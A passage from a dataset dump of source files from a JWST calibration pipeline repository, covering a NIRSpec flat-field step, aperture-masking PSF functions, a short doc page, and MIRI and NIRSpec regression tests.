[\n \"NRS_CONFIRM\",\n \"NRS_FOCUS\",\n \"NRS_IMAGE\",\n \"NRS_MIMF\",\n \"NRS_MSATA\",\n \"NRS_TACONFIRM\",\n \"NRS_TACQ\",\n \"NRS_TASLIT\",\n \"NRS_WATA\",\n ]\n# Supported NIRSpec spectrographic types. No flat fielding for NRS_AUTOFLAT\nNRS_SPEC_MODES = [\n \"NRS_BRIGHTOBJ\",\n \"NRS_FIXEDSLIT\",\n \"NRS_IFU\",\n \"NRS_MSASPEC\",\n ]\n\n\n__all__ = [\"FlatFieldStep\"]\n\n\nclass FlatFieldStep(Step):\n \"\"\"Flat-field a science image using a flatfield reference image.\n \"\"\"\n\n spec = \"\"\"\n save_interpolated_flat = boolean(default=False) # Save interpolated NRS flat\n \"\"\"\n\n reference_file_types = [\"flat\", \"fflat\", \"sflat\", \"dflat\"]\n\n # Define a suffix for optional saved output of the interpolated flat for NRS\n flat_suffix = 'interpolatedflat'\n\n def process(self, input):\n\n input_model = datamodels.open(input)\n exposure_type = input_model.meta.exposure.type.upper()\n\n self.log.debug(\"Input is {} of exposure type {}\".format(\n input_model.__class__.__name__, exposure_type))\n\n if input_model.meta.instrument.name.upper() == \"NIRSPEC\":\n if (exposure_type not in NRS_SPEC_MODES and\n exposure_type not in NRS_IMAGING_MODES):\n self.log.warning(\"Exposure type is %s; flat-fielding will be \"\n \"skipped because it is not currently \"\n \"supported for this mode.\", exposure_type)\n return self.skip_step(input_model)\n\n # Check whether extract_2d has been run.\n if (input_model.meta.cal_step.extract_2d == 'COMPLETE' and\n not exposure_type in EXTRACT_2D_IS_OK):\n self.log.warning(\"The extract_2d step has been run, but for \"\n \"%s data it should not have been run, so ...\",\n exposure_type)\n self.log.warning(\"flat fielding will be skipped.\")\n return self.skip_step(input_model)\n\n # Get reference file paths\n reference_file_names = {}\n for reftype in self.reference_file_types:\n reffile = self.get_reference_file(input_model, reftype)\n reference_file_names[reftype] = reffile if reffile != 'N/A' else None\n\n # Define mapping between reftype and datamodel type\n model_type = dict(\n flat=datamodels.FlatModel,\n fflat=datamodels.NirspecFlatModel,\n sflat=datamodels.NirspecFlatModel,\n dflat=datamodels.NirspecFlatModel,\n )\n if exposure_type == \"NRS_MSASPEC\":\n model_type[\"fflat\"] = datamodels.NirspecQuadFlatModel\n\n # Open the relevant reference files as datamodels\n reference_file_models = {}\n for reftype, reffile in reference_file_names.items():\n if reffile is not None:\n reference_file_models[reftype] = model_type[reftype](reffile)\n self.log.debug('Using %s reference file: %s', reftype.upper(), reffile)\n else:\n reference_file_models[reftype] = None\n\n # Do the flat-field correction\n output_model, interpolated_flats = flat_field.do_correction(\n input_model,\n **reference_file_models,\n )\n\n # Close the input and reference files\n input_model.close()\n try:\n for model in reference_file_models.values():\n model.close()\n except AttributeError:\n pass\n\n if self.save_interpolated_flat and interpolated_flats is not None:\n self.log.info(\"Writing interpolated flat field.\")\n self.save_model(interpolated_flats, suffix=self.flat_suffix)\n interpolated_flats.close()\n\n return output_model\n\n def skip_step(self, input_model):\n \"\"\"Set the calibration switch to SKIPPED.\n\n This method makes a copy of input_model, sets the calibration\n switch for the flat_field step to SKIPPED in the copy, closes\n input_model, and returns the copy.\n \"\"\"\n\n result = input_model.copy()\n result.meta.cal_step.flat_field = \"SKIPPED\"\n input_model.close()\n return result\n" }, { "alpha_fraction": 0.5639089941978455, "alphanum_fraction": 0.5743139982223511, "avg_line_length": 24.071611404418945, "blob_id": "6404162147d8307cf1a29e82c20eadd29d8d0352", "content_id": "565a4406dbebe36f83f94a939557ddfab6e8870a", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9803, "license_type": "permissive", "max_line_length": 81, "num_lines": 391, "path": "/jwst/ami/analyticnrm2.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\n# Heritage mathematia nb from Alex & Laurent\n# Python by Alex Greenbaum & Anand Sivaramakrishnan Jan 2013\n# updated May 2013 to include hexagonal envelope\n\nfrom . import hexee\n\nimport logging\nimport numpy as np\nimport scipy.special\nfrom . import leastsqnrm\n\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.DEBUG)\n\ndef Jinc(x, y):\n \"\"\"\n Short Summary\n -------------\n Compute 2d Jinc for given coordinates\n\n Parameters\n ----------\n x,y: floats\n input coordinates\n\n Returns\n -------\n jinc_2d: float array\n 2d Jinc at the given coordinates, with NaNs replaced by pi/4.\n \"\"\"\n R = (Jinc.d / Jinc.lam) * Jinc.pitch * \\\n np.sqrt((x - Jinc.offx)*(x - Jinc.offx) + \\\n (y - Jinc.offy)*(y - Jinc.offy))\n\n jinc_2d = leastsqnrm.replacenan(scipy.special.jv(1, np.pi * R)/(2.0 * R))\n\n return jinc_2d\n\n\ndef phasor(kx, ky, hx, hy, lam, phi, pitch):\n \"\"\"\n Short Summary\n -------------\n Calculate wavefront for a single hole ??\n\n Parameters\n ----------\n kx, ky: float\n image plane coords in units of sampling pitch (oversampled, or not)\n\n hx, hy: float\n hole centers in meters\n\n lam: float\n wavelength\n\n phi: float\n distance of fringe from hole center in units of waves\n\n pitch: float\n sampling pitch in radians in image plane\n\n Returns\n -------\n phasor: complex\n Calculate wavefront for a single hole\n \"\"\"\n return np.exp(-2 * np.pi * 1j * ((pitch * kx * hx + pitch * ky * hy)\n / lam + (phi / lam)))\n\n\ndef interf(kx, ky):\n \"\"\"\n Short Summary\n -------------\n Calculate interference for all holes.\n\n Parameters\n ----------\n kx, ky: float, float\n x-component and y-component of image plane (spatial frequency) vector\n\n Returns\n -------\n interference: 2D complex array\n interference for all holes\n \"\"\"\n interference = 0j\n for hole, ctr in enumerate(interf.ctrs):\n interference += phasor((kx - interf.offx), (ky - interf.offy),\n ctr[0], ctr[1], interf.lam,\n interf.phi[hole], interf.pitch)\n\n return interference\n\n\ndef ASF(pixel, fov, oversample, ctrs, d, lam, phi, centering=(0.5, 0.5)):\n \"\"\"\n Short Summary\n -------------\n Calculate the Amplitude Spread Function (a.k.a. image plane complex\n amplitude) for a circular aperture\n\n Parameters\n ----------\n pixel: float\n pixel scale\n\n fov: integer\n number of detector pixels on a side\n\n oversample: integer\n oversampling factor\n\n ctrs: float, float\n coordinates of hole center\n\n d: float\n hole diameter\n\n lam: float\n wavelength\n\n phi: float\n distance of fringe from hole center in units of waves\n\n centering: string\n if set to 'PIXELCENTERED' or unspecified, the offsets will be set to\n (0.5,0.5); if set to 'PIXELCORNER', the offsets will be set to\n (0.0,0.0).\n\n Returns\n -------\n asf: 2D complex array\n Amplitude Spread Function (a.k.a. image plane complex amplitude) for\n a circular aperture\n \"\"\"\n if centering == 'PIXELCENTERED':\n off_x = 0.5\n off_y = 0.5\n elif centering == 'PIXELCORNER':\n off_x = 0.0\n off_y = 0.0\n else:\n off_x, off_y = centering\n\n log.debug('ASF centering %s:', centering)\n log.debug('ASF offsets %s %s:', off_x, off_y)\n\n # Jinc parameters\n Jinc.lam = lam\n Jinc.offx = oversample * fov / 2.0 - off_x # in pixels\n Jinc.offy = oversample * fov / 2.0 - off_y\n Jinc.pitch = pixel / float(oversample)\n Jinc.d = d\n\n primarybeam = np.fromfunction(Jinc, (int((oversample * fov)),\n int((oversample * fov))))\n primarybeam = primarybeam.transpose()\n\n # interference terms' parameters\n interf.lam = lam\n interf.offx = oversample * fov / 2.0 - off_x # in pixels\n interf.offy = oversample * fov / 2.0 - off_y\n interf.pitch = pixel / float(oversample)\n interf.ctrs = ctrs\n interf.phi = phi\n\n fringing = np.fromfunction(interf, (int((oversample * fov)),\n int((oversample * fov))))\n fringing = fringing.transpose()\n\n asf = primarybeam * fringing\n\n return asf\n\n\ndef ASFfringe(pixel, fov, oversample, ctrs, d, lam, phi, centering=(0.5, 0.5)):\n \"\"\"\n Short Summary\n -------------\n Amplitude Spread Function (a.k.a. image plane complex amplitude)\n for a fringe\n\n Parameters\n ----------\n pixel: float\n pixel scale\n\n fov: integer\n number of detector pixels on a side\n\n oversample: integer\n oversampling factor\n\n ctrs: 2D float array\n centers of holes\n\n d: float\n hole diameter\n\n lam: float\n wavelength\n\n phi: float\n distance of fringe from hole center in units of waves\n\n centering: string\n if set to 'PIXELCENTERED' or unspecified, the offsets will be set to\n (0.5,0.5); if set to 'PIXELCORNER', the offsets will be set to\n (0.0,0.0).\n\n Returns\n -------\n fringing: 2D complex array\n Amplitude Spread Function (a.k.a. image plane complex amplitude) for\n a fringe\n \"\"\"\n if centering == 'PIXELCENTERED':\n off_x = 0.5\n off_y = 0.5\n elif centering == 'PIXELCORNER':\n off_x = 0.0\n off_y = 0.0\n else:\n off_x, off_y = centering\n\n log.debug('ASFfringe centering %s:', centering)\n log.debug('ASFfringe offsets %s %s:', off_x, off_y)\n\n # Jinc parameters\n Jinc.lam = lam\n Jinc.offx = oversample * fov / 2.0 - off_x # in pixels\n Jinc.offy = oversample * fov / 2.0 - off_y\n Jinc.pitch = pixel / float(oversample)\n Jinc.d = d\n\n # interference terms' parameters\n interf.lam = lam\n interf.offx = oversample * fov / 2.0 - off_x # in pixels\n interf.offy = oversample * fov / 2.0 - off_y\n interf.pitch = pixel / float(oversample)\n interf.ctrs = ctrs\n interf.phi = phi\n\n fringing = np.fromfunction(interf, (int((oversample * fov)),\n int((oversample * fov))))\n fringing = fringing.transpose()\n\n return fringing\n\n\ndef ASFhex(pixel, fov, oversample, ctrs, d, lam, phi, centering='PIXELCENTERED'):\n \"\"\"\n Short Summary\n -------------\n Amplitude Spread Function (a.k.a. image plane complex amplitude)\n for a hexagonal aperture\n\n Parameters\n ----------\n pixel: float\n pixel scale\n\n fov: integer\n number of detector pixels on a side\n\n oversample: integer\n oversampling factor\n\n ctrs: 2D float array\n centers of holes\n\n d: float\n flat-to-flat distance across hexagon\n\n lam: float\n wavelength\n\n phi: float\n distance of fringe from hole center in units of waves\n\n centering: string\n type of centering\n\n Returns\n -------\n asf: 2D complex array\n Amplitude Spread Function (a.k.a. image plane complex amplitude) for\n a hexagonal aperture\n \"\"\"\n log.debug('centering: %s', centering)\n\n if centering == 'PIXELCENTERED':\n off_x = 0.5\n off_y = 0.5\n elif centering == 'PIXELCORNER':\n off_x = 0.0\n off_y = 0.0\n else:\n off_x, off_y = centering\n\n #Hex kwargs\n offx = (float(oversample * fov) / 2.0) - off_x # in pixels\n offy = (float(oversample * fov) / 2.0) - off_y\n\n log.debug('ASF offsets for x and y in pixels: %s %s', offx, offy)\n log.debug('ASF centering:%s', centering)\n\n pitch = pixel / float(oversample)\n\n # interference terms' parameters\n interf.lam = lam\n interf.offx = (oversample * fov) / 2.0 - off_x # in pixels\n interf.offy = (oversample * fov) / 2.0 - off_y\n interf.pitch = pixel / float(oversample)\n interf.ctrs = ctrs\n interf.phi = phi\n\n primarybeam = hexee.hex_eeAG(s=(oversample * fov, oversample * fov),\n c=(offx, offy), d=d, lam=lam, pitch=pitch)\n\n fringing = np.fromfunction(interf, (int((oversample * fov)),\n int((oversample * fov))))\n fringing = fringing.transpose()\n\n asf = primarybeam * fringing\n\n return asf\n\n\ndef PSF(pixel, fov, oversample, ctrs, d, lam, phi, centering='PIXELCENTERED',\n shape='circ'):\n \"\"\"\n Short Summary\n -------------\n Calculate the PSF for the requested shape\n\n Parameters\n ----------\n pixel: float\n pixel scale\n\n fov: integer\n number of detector pixels on a side\n\n oversample: integer\n oversampling factor\n\n ctrs: 2D float array\n centers of holes\n\n d: float\n hole diameter for 'circ'; flat-to-flat distance across for 'hex'\n\n lam: float\n wavelength\n\n phi: float\n distance of fringe from hole center in units of waves\n\n centering: string\n type of centering\n\n shape: string\n shape of hole; possible values are 'circ', 'hex', and 'fringe'\n\n Returns\n -------\n PSF - 2D float array\n \"\"\"\n if shape == 'circ':\n asf = ASF(pixel, fov, oversample, ctrs, d, lam, phi, centering)\n elif shape == 'hex':\n asf = ASFhex(pixel, fov, oversample, ctrs, d, lam, phi, centering)\n elif shape == 'fringe': # Alex: \"not needed,only used for visualization\"\n asf = ASFfringe(pixel, fov, oversample, ctrs, d, lam, phi, centering)\n else:\n log.critical('Pupil shape %s not supported', shape)\n\n log.debug('-----------------')\n log.debug(' PSF Parameters: ')\n log.debug('-----------------')\n log.debug('pixel: %s, fov: %s, oversampling: %s', pixel, fov, oversample)\n log.debug('d: %s, wavelength: %s, pistons: %s, shape: %s', d, lam, phi,\n shape)\n\n PSF_ = asf * asf.conj()\n\n return PSF_.real\n" }, { "alpha_fraction": 0.6436781883239746, "alphanum_fraction": 0.6436781883239746, "avg_line_length": 28, "blob_id": "a673bbc4f7360115f8899349f895c1f98b924ceb", "content_id": "31ae03591f83fe436851ceaf4be60d601bb3489a", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 87, "license_type": "permissive", "max_line_length": 56, "num_lines": 3, "path": "/docs/jwst/white_light/arguments.rst", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "Step Arguments\n==============\nThe ``white_light`` step has no step-specific arguments.\n" }, { "alpha_fraction": 0.6119047403335571, "alphanum_fraction": 0.6380952596664429, "avg_line_length": 20, "blob_id": "712514f351427de1c718442ea842d3cde62b30f7", "content_id": "7ab36dcf9a0a1eaa3fc4716319fea5216cf174ce", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 420, "license_type": "permissive", "max_line_length": 55, "num_lines": 20, "path": "/jwst/datamodels/tests/test_level1b.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"Test Level1bModel\"\"\"\n\nimport pytest\nimport numpy as np\n\nfrom .. import Level1bModel\n\n\[email protected]\ndef test_no_zeroframe():\n \"\"\"Test for default zeroframe\"\"\"\n nx = 10\n ny = 10\n ngroups = 5\n nints = 2\n\n data = np.zeros((nints, ngroups, ny, nx), np.int16)\n model = Level1bModel(data)\n assert model.data.shape == (nints, ngroups, ny, nx)\n assert model.zeroframe.shape == (nints, ny, nx)\n" }, { "alpha_fraction": 0.3427337408065796, "alphanum_fraction": 0.5027947425842285, "avg_line_length": 48.20000076293945, "blob_id": "e3aa748d2d9db2c43f040ce52655d2a61ec0c8a2", "content_id": "9a4f86e54db1f6a68f00f4e6bfeeb5ef88bea81e", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3936, "license_type": "permissive", "max_line_length": 87, "num_lines": 80, "path": "/jwst/tests_nightly/general/nirspec/test_spec2pipelines.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom jwst.pipeline import Spec2Pipeline\n\nfrom jwst.tests.base_classes import BaseJWSTTest\nfrom jwst.tests.base_classes import pytest_generate_tests # noqa: F401\n\n\[email protected]\nclass TestSpec2Pipeline(BaseJWSTTest):\n input_loc = 'nirspec'\n ref_loc = ['test_pipelines', 'truth']\n test_dir = 'test_pipelines'\n\n # Specification of parameters for Spec2Pipeline tests\n params = {'test_spec2':\n # test_nrs_fs_multi_spec2_1: NIRSpec fixed-slit data\n [dict(input='jw00023001001_01101_00001_NRS1_rate.fits',\n outputs=[('jw00023001001_01101_00001_NRS1_cal.fits',\n 'jw00023001001_01101_00001_NRS1_cal_ref.fits'),\n ('jw00023001001_01101_00001_NRS1_s2d.fits',\n 'jw00023001001_01101_00001_NRS1_s2d_ref.fits'),\n ('jw00023001001_01101_00001_NRS1_x1d.fits',\n 'jw00023001001_01101_00001_NRS1_x1d_ref.fits')\n ],\n id=\"nirspec_fs_multi_1\"\n ),\n # test_nrs_fs_multi_spec2_2: NIRSpec fixed-slit data\n dict(input= 'jwtest1013001_01101_00001_NRS1_rate.fits',\n outputs=[('jwtest1013001_01101_00001_NRS1_cal.fits',\n 'jwtest1013001_01101_00001_NRS1_cal_ref.fits'),\n ('jwtest1013001_01101_00001_NRS1_s2d.fits',\n 'jwtest1013001_01101_00001_NRS1_s2d_ref.fits'),\n ('jwtest1013001_01101_00001_NRS1_x1d.fits',\n 'jwtest1013001_01101_00001_NRS1_x1d_ref.fits')\n ],\n id=\"nirspec_fs_multi_2\"\n ),\n # test_nrs_fs_multi_spec2_3:\n # NIRSpec fixed-slit data using the ALLSLITS subarray and detector NRS2\n # NIRSpec fixed-slit data that uses a single-slit subarray (S200B1).\n dict(input= 'jw84600002001_02101_00001_nrs2_rate.fits',\n outputs=[('jw84600002001_02101_00001_nrs2_cal.fits',\n 'jw84600002001_02101_00001_nrs2_cal_ref.fits'),\n ('jw84600002001_02101_00001_nrs2_s2d.fits',\n 'jw84600002001_02101_00001_nrs2_s2d_ref.fits'),\n ('jw84600002001_02101_00001_nrs2_x1d.fits',\n 'jw84600002001_02101_00001_nrs2_x1d_ref.fits')\n ],\n id=\"nirspec_fs_multi_3\"\n ),\n # test_nrs_ifu_spec2: NIRSpec IFU data\n dict(input= 'jw95175001001_02104_00001_nrs1_rate.fits',\n outputs=[('jw95175001001_02104_00001_nrs1_cal.fits',\n 'jw95175001001_02104_00001_nrs1_cal_ref.fits'),\n ('jw95175001001_02104_00001_nrs1_s3d.fits',\n 'jw95175001001_02104_00001_nrs1_s3d_ref.fits'),\n ('jw95175001001_02104_00001_nrs1_x1d.fits',\n 'jw95175001001_02104_00001_nrs1_x1d_ref.fits')\n ],\n id = \"nirspec_ifu\"\n )\n ]\n }\n\n def test_spec2(self, input, outputs):\n \"\"\"\n Regression test of calwebb_spec2 pipeline performed on NIRSpec data.\n \"\"\"\n input_file = self.get_data(self.test_dir, input)\n\n step = Spec2Pipeline()\n step.save_bsub = True\n step.save_results = True\n step.resample_spec.save_results = True\n step.cube_build.save_results = True\n step.extract_1d.save_results = True\n step.run(input_file)\n\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.5622591376304626, "alphanum_fraction": 0.5953651666641235, "avg_line_length": 37.5485725402832, "blob_id": "c1067a5fc296d1851e30c9e59564f53ebcfa0ac8", "content_id": "83ec5ffad15a7c54c997ff9a73b67078c952f250", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 20238, "license_type": "permissive", "max_line_length": 105, "num_lines": 525, "path": "/jwst/tests_nightly/general/miri/test_miri_steps_single.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import os\nimport numpy as np\nfrom numpy.testing import assert_allclose\nimport pytest\nfrom gwcs.wcstools import grid_from_bounding_box\nfrom ci_watson.artifactory_helpers import get_bigdata\n\nfrom jwst import datamodels\nfrom jwst.datamodels import ImageModel, RegionsModel, CubeModel\nfrom jwst.stpipe import crds_client\nfrom jwst.lib.set_telescope_pointing import add_wcs\nfrom jwst.tests.base_classes import BaseJWSTTest, raw_from_asn\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\nfrom jwst.assign_wcs import AssignWcsStep\nfrom jwst.cube_build import CubeBuildStep\nfrom jwst.linearity import LinearityStep\nfrom jwst.ramp_fitting import RampFitStep\nfrom jwst.master_background import MasterBackgroundStep\n\n\[email protected]\nclass TestMIRIRampFit(BaseJWSTTest):\n input_loc = 'miri'\n ref_loc = ['test_ramp_fit', 'truth']\n test_dir = 'test_ramp_fit'\n\n def test_ramp_fit_miri1(self):\n \"\"\"\n Regression test of ramp_fit step performed on MIRI data.\n \"\"\"\n input_file = self.get_data(self.test_dir, 'jw00001001001_01101_00001_MIRIMAGE_jump.fits')\n\n result = RampFitStep.call(input_file,\n save_opt=True,\n opt_name='rampfit1_opt_out.fits')\n output_file = result[0].save(path=result[0].meta.filename.replace('jump','rampfit'))\n int_output = result[1].save(path=result[1].meta.filename.replace('jump','rampfit_int'))\n result[0].close()\n result[1].close()\n\n outputs = [(output_file,\n 'jw00001001001_01101_00001_MIRIMAGE_ramp_fit.fits'),\n (int_output,\n 'jw00001001001_01101_00001_MIRIMAGE_int.fits'),\n ('rampfit1_opt_out_fitopt.fits',\n 'jw00001001001_01101_00001_MIRIMAGE_opt.fits')\n ]\n self.compare_outputs(outputs)\n\n def test_ramp_fit_miri2(self):\n \"\"\"\n Regression test of ramp_fit step performed on MIRI data.\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw80600012001_02101_00003_mirimage_jump.fits')\n\n result = RampFitStep.call(input_file,\n save_opt=True,\n opt_name='rampfit2_opt_out.fits')\n\n output_file = result[0].save(path=result[0].meta.filename.replace('jump','rampfit'))\n int_output = result[1].save(path=result[1].meta.filename.replace('jump','rampfit_int'))\n result[0].close()\n result[1].close()\n\n outputs = [(output_file,\n 'jw80600012001_02101_00003_mirimage_ramp.fits'),\n (int_output,\n 'jw80600012001_02101_00003_mirimage_int.fits'),\n ('rampfit2_opt_out_fitopt.fits',\n 'jw80600012001_02101_00003_mirimage_opt.fits')\n ]\n self.compare_outputs(outputs)\n\n\[email protected]\nclass TestMIRICube(BaseJWSTTest):\n input_loc = 'miri'\n ref_loc = ['test_cube_build', 'truth']\n test_dir = 'test_cube_build'\n rtol = 0.000001\n\n def test_cubebuild_miri(self):\n \"\"\"\n Regression test of cube_build performed on MIRI MRS data.\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw10001001001_01101_00001_mirifushort_cal.fits')\n\n input_model = datamodels.IFUImageModel(input_file)\n CubeBuildStep.call(input_model, output_type='multi', save_results=True)\n\n outputs = [('jw10001001001_01101_00001_mirifushort_s3d.fits',\n 'jw10001001001_01101_00001_mirifushort_s3d_ref.fits',\n ['primary','sci','err','dq','wmap']) ]\n self.compare_outputs(outputs)\n\n\[email protected]\nclass TestMIRILinearity(BaseJWSTTest):\n input_loc = 'miri'\n ref_loc = ['test_linearity','truth']\n test_dir ='test_linearity'\n\n def test_linearity_miri3(self):\n \"\"\"\n Regression test of linearity step performed on MIRI data.\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw00001001001_01109_00001_MIRIMAGE_dark_current.fits')\n # get supplemental input\n override_file = self.get_data(self.test_dir,\n \"lin_nan_flag_miri.fits\")\n # run calibration step\n result = LinearityStep.call(input_file,\n override_linearity=override_file)\n\n output_file = result.meta.filename\n result.save(output_file)\n result.close()\n\n outputs = [(output_file,\n 'jw00001001001_01109_00001_MIRIMAGE_linearity.fits') ]\n self.compare_outputs(outputs)\n\n\[email protected]\nclass TestMIRIWCSFixed(BaseJWSTTest):\n input_loc = 'miri'\n ref_loc = ['test_wcs','fixed','truth']\n test_dir = os.path.join('test_wcs','fixed')\n\n def test_miri_fixed_slit_wcs(self):\n \"\"\"\n Regression test of creating a WCS object and doing pixel to sky transformation.\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw00035001001_01101_00001_mirimage_rate.fits')\n result = AssignWcsStep.call(input_file, save_results=True)\n\n cwd = os.path.abspath('.')\n os.makedirs('truth', exist_ok=True)\n os.chdir('truth')\n truth_file = self.get_data(*self.ref_loc,\n 'jw00035001001_01101_00001_mirimage_assign_wcs.fits')\n os.chdir(cwd)\n truth = ImageModel(truth_file)\n\n x, y = grid_from_bounding_box(result.meta.wcs.bounding_box)\n ra, dec, lam = result.meta.wcs(x, y)\n raref, decref, lamref = truth.meta.wcs(x, y)\n assert_allclose(ra, raref)\n assert_allclose(dec, decref)\n assert_allclose(lam, lamref)\n\n\[email protected]\nclass TestMIRIWCSIFU(BaseJWSTTest):\n input_loc = 'miri'\n ref_loc = ['test_wcs', 'ifu', 'truth']\n test_dir = os.path.join('test_wcs', 'ifu')\n\n def test_miri_ifu_wcs(self):\n \"\"\"\n Regression test of creating a WCS object and doing pixel to sky transformation.\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw00024001001_01101_00001_MIRIFUSHORT_uncal_MiriSloperPipeline.fits')\n result = AssignWcsStep.call(input_file, save_results=True)\n\n # Get the region file\n region = RegionsModel(crds_client.get_reference_file(result, 'regions'))\n # Choose the same plane as in the miri.py file (hardcoded for now).\n regions = region.regions[7, :, :]\n\n # inputs\n x, y = grid_from_bounding_box(result.meta.wcs.bounding_box)\n\n # Get indices where pixels == 0. These should be NaNs in the output.\n ind_zeros = regions == 0\n\n cwd = os.path.abspath('.')\n os.makedirs('truth', exist_ok=True)\n os.chdir('truth')\n truth_file = self.get_data(*self.ref_loc,\n 'jw00024001001_01101_00001_MIRIFUSHORT_assign_wcs.fits')\n os.chdir(cwd)\n truth = ImageModel(truth_file)\n\n ra, dec, lam = result.meta.wcs(x, y)\n raref, decref, lamref = truth.meta.wcs(x, y)\n assert_allclose(ra, raref, equal_nan=True)\n assert_allclose(dec, decref, equal_nan=True)\n assert_allclose(lam, lamref, equal_nan=True)\n\n # Test that we got NaNs at ind_zero\n assert(np.isnan(ra).nonzero()[0] == ind_zeros.nonzero()[0]).all()\n assert(np.isnan(ra).nonzero()[1] == ind_zeros.nonzero()[1]).all()\n\n # Test the inverse transform\n x1, y1 = result.meta.wcs.backward_transform(ra, dec, lam)\n assert(np.isnan(x1).nonzero()[0] == ind_zeros.nonzero()[0]).all()\n assert (np.isnan(x1).nonzero()[1] == ind_zeros.nonzero()[1]).all()\n\n # Also run a smoke test with values outside the region.\n dec[100][200] = -80\n ra[100][200] = 7\n lam[100][200] = 15\n\n x2, y2 = result.meta.wcs.backward_transform(ra, dec, lam)\n assert np.isnan(x2[100][200])\n assert np.isnan(x2[100][200])\n\n\[email protected]\nclass TestMIRIWCSImage(BaseJWSTTest):\n input_loc = 'miri'\n ref_loc = ['test_wcs', 'image', 'truth']\n test_dir = os.path.join('test_wcs', 'image')\n\n def test_miri_image_wcs(self):\n \"\"\"\n Regression test of creating a WCS object and doing pixel to sky transformation.\n \"\"\"\n\n input_file = self.get_data(self.test_dir,\n \"jw00001001001_01101_00001_MIRIMAGE_ramp_fit.fits\")\n result = AssignWcsStep.call(input_file, save_results=True)\n\n cwd = os.path.abspath('.')\n os.makedirs('truth', exist_ok=True)\n os.chdir('truth')\n truth_file = self.get_data(*self.ref_loc,\n \"jw00001001001_01101_00001_MIRIMAGE_assign_wcs.fits\")\n os.chdir(cwd)\n truth = ImageModel(truth_file)\n\n x, y = grid_from_bounding_box(result.meta.wcs.bounding_box)\n ra, dec = result.meta.wcs(x, y)\n raref, decref = truth.meta.wcs(x, y)\n assert_allclose(ra, raref)\n assert_allclose(dec, decref)\n\n\[email protected]\nclass TestMIRIWCSSlitless(BaseJWSTTest):\n input_loc = 'miri'\n ref_loc = ['test_wcs', 'slitless', 'truth']\n test_dir = os.path.join('test_wcs', 'slitless')\n\n def test_miri_slitless_wcs(self):\n \"\"\"\n Regression test of creating a WCS object and doing pixel to sky transformation.\n \"\"\"\n input_file = self.get_data(self.test_dir,\n \"jw80600012001_02101_00003_mirimage_rateints.fits\")\n result = AssignWcsStep.call(input_file, save_results=True)\n\n cwd = os.path.abspath('.')\n os.makedirs('truth', exist_ok=True)\n os.chdir('truth')\n truth_file = self.get_data(*self.ref_loc,\n \"jw80600012001_02101_00003_mirimage_assignwcsstep.fits\")\n os.chdir(cwd)\n truth = CubeModel(truth_file)\n\n x, y = grid_from_bounding_box(result.meta.wcs.bounding_box)\n ra, dec, lam = result.meta.wcs(x, y)\n raref, decref, lamref = truth.meta.wcs(x, y)\n assert_allclose(ra, raref)\n assert_allclose(dec, decref)\n assert_allclose(lam, lamref)\n\n\[email protected]\nclass TestMIRISetPointing(BaseJWSTTest):\n input_loc = 'miri'\n ref_loc = ['test_pointing', 'truth']\n test_dir = 'test_pointing'\n rtol = 0.000001\n\n def test_miri_setpointing(self):\n \"\"\"\n Regression test of the set_telescope_pointing script on a level-1b MIRI file.\n \"\"\"\n\n # Copy original version of file to test file, which will get overwritten by test\n input_file = self.get_data(self.test_dir,\n 'jw80600010001_02101_00001_mirimage_uncal_orig.fits')\n # Get SIAF PRD database file\n siaf_prd_loc = ['jwst-pipeline', self.env, 'common', 'prd.db']\n siaf_path = get_bigdata(*siaf_prd_loc)\n\n add_wcs(input_file, allow_default=True, siaf_path=siaf_path)\n\n outputs = [(input_file,\n 'jw80600010001_02101_00001_mirimage_uncal_ref.fits')]\n self.compare_outputs(outputs)\n\n\[email protected]\nclass TestMIRIMasterBackgroundLRS(BaseJWSTTest):\n input_loc = 'miri'\n ref_loc = ['test_masterbackground', 'lrs', 'truth']\n test_dir = ['test_masterbackground', 'lrs']\n\n rtol = 0.000001\n\n def test_miri_lrs_masterbg_user(self):\n \"\"\"\n Regression test of masterbackgound subtraction with lrs, with user provided 1-D background\n \"\"\"\n\n # input file has the background added\n input_file = self.get_data(*self.test_dir, 'miri_lrs_sci+bkg_cal.fits')\n # user provided 1-D background\n user_background = self.get_data(*self.test_dir, 'miri_lrs_bkg_x1d.fits')\n\n result = MasterBackgroundStep.call(input_file,\n user_background=user_background,\n save_results=True)\n\n # Compare result (background subtracted image) to science image with no\n # background. Subtract these images, smooth the subtracted image and\n # the mean should be close to zero.\n input_sci_cal_file = self.get_data(*self.test_dir,\n 'miri_lrs_sci_cal.fits')\n input_sci = datamodels.open(input_sci_cal_file)\n\n # find the LRS region\n bb = result.meta.wcs.bounding_box\n x, y = grid_from_bounding_box(bb)\n result_lrs_region = result.data[y.astype(int), x.astype(int)]\n sci_lrs_region = input_sci.data[y.astype(int), x.astype(int)]\n\n # do a 5 sigma clip on the science image\n sci_mean = np.nanmean(sci_lrs_region)\n sci_std = np.nanstd(sci_lrs_region)\n upper = sci_mean + sci_std*5.0\n lower = sci_mean - sci_std*5.0\n mask_clean = np.logical_and(sci_lrs_region < upper, sci_lrs_region > lower)\n\n sub = result_lrs_region - sci_lrs_region\n mean_sub = np.absolute(np.mean(sub[mask_clean]))\n\n atol = 0.1\n rtol = 0.001\n assert_allclose(mean_sub, 0, atol=atol, rtol=rtol)\n\n # Test 3 Compare background subtracted science data (results)\n # to a truth 